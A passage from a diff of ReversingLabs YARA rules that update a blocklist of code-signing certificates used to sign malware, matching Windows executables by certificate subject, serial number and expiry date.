pe.signatures[i].serial=="ed:9c:ae:b7:91:1b:31:bd") and 1506001740<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aqua Direct s.r.o." and (pe.signatures[i].serial=="00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures[i].serial=="ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f") and 1606089600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab" + id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14168-L14184" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8246-L8262" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502" score = 75 quality = 90 tags = "INFO, FILE" @@ -19787,22 +39578,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BEAR AND CILLA LTD" and pe.signatures[i].serial=="0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures[i].serial=="0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0e844bef-1cfe-5eba-af4d-d8477e55470c" + id = "00e096f6-2955-5936-9a75-f537c2da3621" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14186-L14202" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8264-L8280" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b" score = 75 quality = 90 tags = "INFO, FILE" @@ -19812,22 +39603,22 @@ rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures[i].serial=="2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foreground" and pe.signatures[i].serial=="58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c" + id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14204-L14220" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8282-L8298" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2" score = 75 quality = 90 tags = "INFO, FILE" @@ -19837,22 +39628,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SG Internet" and pe.signatures[i].serial=="6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PILOTE SPRL" and pe.signatures[i].serial=="2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "60a3e63c-4f44-5c75-9928-69859d77af3e" + id = "02f2bf36-e573-502c-8ecc-843a6e627c2b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14222-L14240" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8300-L8316" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2" score = 75 quality = 90 tags = "INFO, FILE" @@ -19862,22 +39653,22 @@ rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures[i].serial=="ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79") and 1527811200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SILVER d.o.o." and pe.signatures[i].serial=="1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9" + id = "a2795796-2897-55ad-936c-456c3b93bf14" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14242-L14258" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8318-L8336" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e" score = 75 quality = 90 tags = "INFO, FILE" @@ -19887,22 +39678,22 @@ rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures[i].serial=="61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pushka LLC" and (pe.signatures[i].serial=="00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures[i].serial=="a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c") and 1611792000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9" + id = "ee861c79-fea2-5931-873d-b76e5bdef593" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14260-L14276" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8338-L8356" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb" score = 75 quality = 90 tags = "INFO, FILE" @@ -19912,22 +39703,22 @@ rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures[i].serial=="03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JJ ELECTRICAL SERVICES LIMITED" and (pe.signatures[i].serial=="00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures[i].serial=="bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76") and 1607472000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b78e3bc2-5b65-507a-9183-148f97baa3e8" + id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14278-L14294" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8358-L8374" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b" score = 75 quality = 90 tags = "INFO, FILE" @@ -19937,22 +39728,22 @@ rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kayak Republic af 2015 APS" and pe.signatures[i].serial=="08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3ad650b2-45ea-5324-b8dc-b48094ae2376" + id = "17571f1e-1dce-5216-8f45-467e5d77ccf1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14296-L14312" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8376-L8394" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1" score = 75 quality = 90 tags = "INFO, FILE" @@ -19962,22 +39753,22 @@ rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dong Qian" and pe.signatures[i].serial=="3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Semantic" and (pe.signatures[i].serial=="00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures[i].serial=="e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56") and 1611532800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "be5e6f35-6177-50bb-82ea-55628acda4c2" + id = "03e861a0-156e-5366-a312-dc2aa73b0393" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14314-L14330" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8396-L8414" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9" score = 75 quality = 90 tags = "INFO, FILE" @@ -19987,22 +39778,22 @@ rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CAUSE FOR CHANGE LTD" and (pe.signatures[i].serial=="00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures[i].serial=="83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94") and 1612137600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc" + id = "fdb1903b-15c1-5cb7-892f-58957303d3b4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14332-L14348" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8416-L8432" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc" score = 75 quality = 90 tags = "INFO, FILE" @@ -20012,22 +39803,22 @@ rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Network Design International Holdings Limited" and pe.signatures[i].serial=="21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb" + id = "d6cb1371-113d-5155-aed2-c575321f0973" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14350-L14366" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8434-L8450" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0" score = 75 quality = 90 tags = "INFO, FILE" @@ -20037,22 +39828,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BE SOL d.o.o." and pe.signatures[i].serial=="2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f86fbd6f-1635-56d7-b390-e067f81b8705" + id = "3cde0016-14d8-5b3a-860e-f5128f899542" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14368-L14384" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8452-L8470" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa" score = 75 quality = 90 tags = "INFO, FILE" @@ -20062,22 +39853,22 @@ rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and pe.signatures[i].serial=="3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dantherm Intelligent Monitoring A/S" and (pe.signatures[i].serial=="00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures[i].serial=="86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76") and 1611273600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8fa1f434-2061-5131-9378-58c584eff447" + id = "226371ea-670f-52f2-8dfc-78b30a29a5cc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14386-L14402" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8472-L8490" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e" score = 75 quality = 90 tags = "INFO, FILE" @@ -20087,22 +39878,22 @@ rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and (pe.signatures[i].serial=="00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures[i].serial=="d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28") and 1617667200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5344bda2-bc11-5700-a0f7-52792c5bb87a" + id = "41b2e05f-1dcd-5ebc-97da-275512deaf72" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14404-L14420" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8492-L8510" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 